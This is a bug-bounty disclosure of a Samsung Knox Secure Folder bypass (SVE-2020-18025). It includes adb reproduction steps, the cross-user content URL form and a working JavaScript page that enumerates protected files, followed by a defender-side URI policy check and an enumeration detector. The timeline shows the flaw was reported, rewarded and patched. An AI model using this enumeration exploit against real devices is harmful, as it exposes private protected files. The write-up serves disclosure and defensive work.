Bypass Samsung Knox protection to read files stored in a secure folder | Android

Description: Samsung Knox is a defensive mobile security platform built into Samsung devices. It combines hardware measures with software components to provide protection at every layer, from the hardware up to the application layer.

I used the path and file-numbering structure of content URLs to bypass Samsung Knox protection and read files stored in the Secure Folder without authorization, and received a $3750 reward from Samsung.

Severity: High | SVE-2020-18025

Vulnerability introduction

Normally, Samsung's multi-user storage environment (MULTI-USER STORAGE) protects confidential files through the Secure Folder app, and the content provider (Content Provider) has no right to expose those files. Files belonging to the Secure Folder user therefore cannot be reached by a browser or by another app.

The vulnerability is that, even while the Secure Folder is locked, these protected files can be reached through the Samsung browser via a content URL. To address a specific file in the multi-user storage environment, the corresponding file number is appended to the content URL, so a JavaScript script can enumerate all files in the multi-user storage environment.


Vulnerability Reproduction:

1. Obtain user information in the multi-user storage environment:

    adb shell pm list users

Then you will get the following information:

    UserInfo{0:rahul:1} running
    UserInfo{150:Secure Folder: } running

2. Construct the following content URL to access the corresponding file (150 is the user id of the Secure Folder user in the listing above):

    content://150@media/external/file/file_number

3. Based on this vulnerability, construct the following HTML file to enumerate the files in the storage:
<script>
    // File number appended to the content URL; the Secure Folder user is 150.
    var i = 0;
    var base = "content://150@media/external/file/";

    // Probe file number i by loading the content URL as a script. The browser
    // fires onload when the URL resolves to a readable file and onerror when
    // it does not. A fresh element is created for each probe, because changing
    // src on a script element that is already in the document does not start
    // a new load.
    function next() {
        var scriptElement = document.createElement("script");
        scriptElement.onerror = function() {
            i++;
            next();
        };
        scriptElement.onload = function() {
            foundIt(scriptElement.src);
        };
        scriptElement.src = base + i;
        document.body.appendChild(scriptElement);
    }

    // Report the first content URL that loaded successfully.
    function foundIt(src) {
        alert(src);
    }

    // Start the enumeration once the page body exists.
    window.onload = next;
</script>

4. To verify the vulnerability and keep the attack steps to a minimum, the HTML file was sent to the victim via WhatsApp;
5. When the victim opens the HTML file in the Samsung browser, the file performs the enumeration. If a valid file is found, the corresponding content URL path is displayed (technically, the HTML file could also be set up to send the result back so that the attacker receives it);
6. Likewise, opening a content URL obtained above in the Samsung browser, such as content://150@media/external/file/1002, displays the protected file, which can then be sent via an XHR request to a server controlled by the attacker.
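As a defender-side illustration of the issue described in the introduction and in the steps above, the following JavaScript (added here, not code from the report or from Samsung) shows two checks a browser or WebView maintainer could apply: refusing content:// references made by web pages, with cross-user URIs of the userId@authority form treated as the most serious, and recognising the sequential file-number probing pattern in a request log. The URI grammar follows the content://150@media/external/file/<n> form used in the report; the function names, the policy, and the sample request log are assumptions constructed for this example.

```javascript
// Added example (not from the report): parse Android content:// URIs of the
// form content://<userId>@<authority>/<path> and apply two defender-side
// checks. Function names, policy and sample data are assumptions.
const CONTENT_URI = /^content:\/\/(?:(\d+)@)?([^/]+)(\/.*)?$/;

// Split a content URI into its optional user id prefix, authority and path.
// Returns null for anything that is not a content URI.
function parseContentUri(uri) {
  const m = CONTENT_URI.exec(uri);
  if (!m) return null;
  return {
    userId: m[1] === undefined ? null : Number(m[1]),
    authority: m[2],
    path: m[3] || "/",
  };
}

// Policy check for a URI referenced by web content (script src, img src, ...).
// callerUserId is the Android user the browser runs as (0 in the report);
// allowedAuthorities lists providers deliberately exposed to pages, if any.
function checkContentUri(uri, { callerUserId = 0, allowedAuthorities = [] } = {}) {
  const p = parseContentUri(uri);
  if (!p) return { allow: true, severity: "none", reason: "not a content URI" };
  if (p.userId !== null && p.userId !== callerUserId) {
    // The report's case: user 150 (Secure Folder) addressed from user 0.
    return { allow: false, severity: "high",
             reason: `cross-user content URI targets user ${p.userId}` };
  }
  if (!allowedAuthorities.includes(p.authority)) {
    return { allow: false, severity: "medium",
             reason: `authority ${p.authority} not exposed to web content` };
  }
  return { allow: true, severity: "none", reason: "allowlisted authority" };
}

// Detection over a request log: flag provider paths that were probed with many
// distinct numeric trailing ids, the footprint of the enumeration script above.
function detectEnumeration(uris, threshold = 5) {
  const seen = new Map(); // "userId|authority|dir" -> Set of numeric ids
  for (const uri of uris) {
    const p = parseContentUri(uri);
    if (!p) continue;
    const m = /^(.*\/)(\d+)$/.exec(p.path);
    if (!m) continue;
    const key = `${p.userId}|${p.authority}|${m[1]}`;
    if (!seen.has(key)) seen.set(key, new Set());
    seen.get(key).add(Number(m[2]));
  }
  const hits = [];
  for (const [key, ids] of seen) {
    if (ids.size < threshold) continue;
    const [userId, authority, dir] = key.split("|");
    hits.push({ userId: userId === "null" ? null : Number(userId),
                authority, dir, count: ids.size });
  }
  return hits;
}

// Constructed sample log: one ordinary page load, the probing pattern against
// the Secure Folder user (ids 0..7 and 1002), and one same-user media reference.
const SAMPLE_REQUESTS = [
  "https://example.com/page.html",
  ...Array.from({ length: 8 }, (_, n) => `content://150@media/external/file/${n}`),
  "content://150@media/external/file/1002",
  "content://media/external/images/media/7",
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(checkContentUri("content://150@media/external/file/1002"));
  console.log(detectEnumeration(SAMPLE_REQUESTS));
}
```

Run with node: the policy check denies the cross-user URI from the report with severity "high", and the log scan reports one hit for user 150, authority media, directory /external/file/ with nine distinct ids, while the single same-user image reference stays below the threshold.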
Proof of concept:

Timeline:

12/06/2020: Issue reported
15/06/2020: Security analyst assigned
24/07/2020: We needed additional time to review the issue with our internal stakeholders.
14/08/2020: We confirmed the vulnerability from your finding and concluded the severity of the vulnerability is High.
15/09/2020: Bounty rewarded $3750
05/10/2020: SVE-2020-18025, We completed our security update and the reward process, as applicable. So, we are now closing this issue. CVE requested

Thank you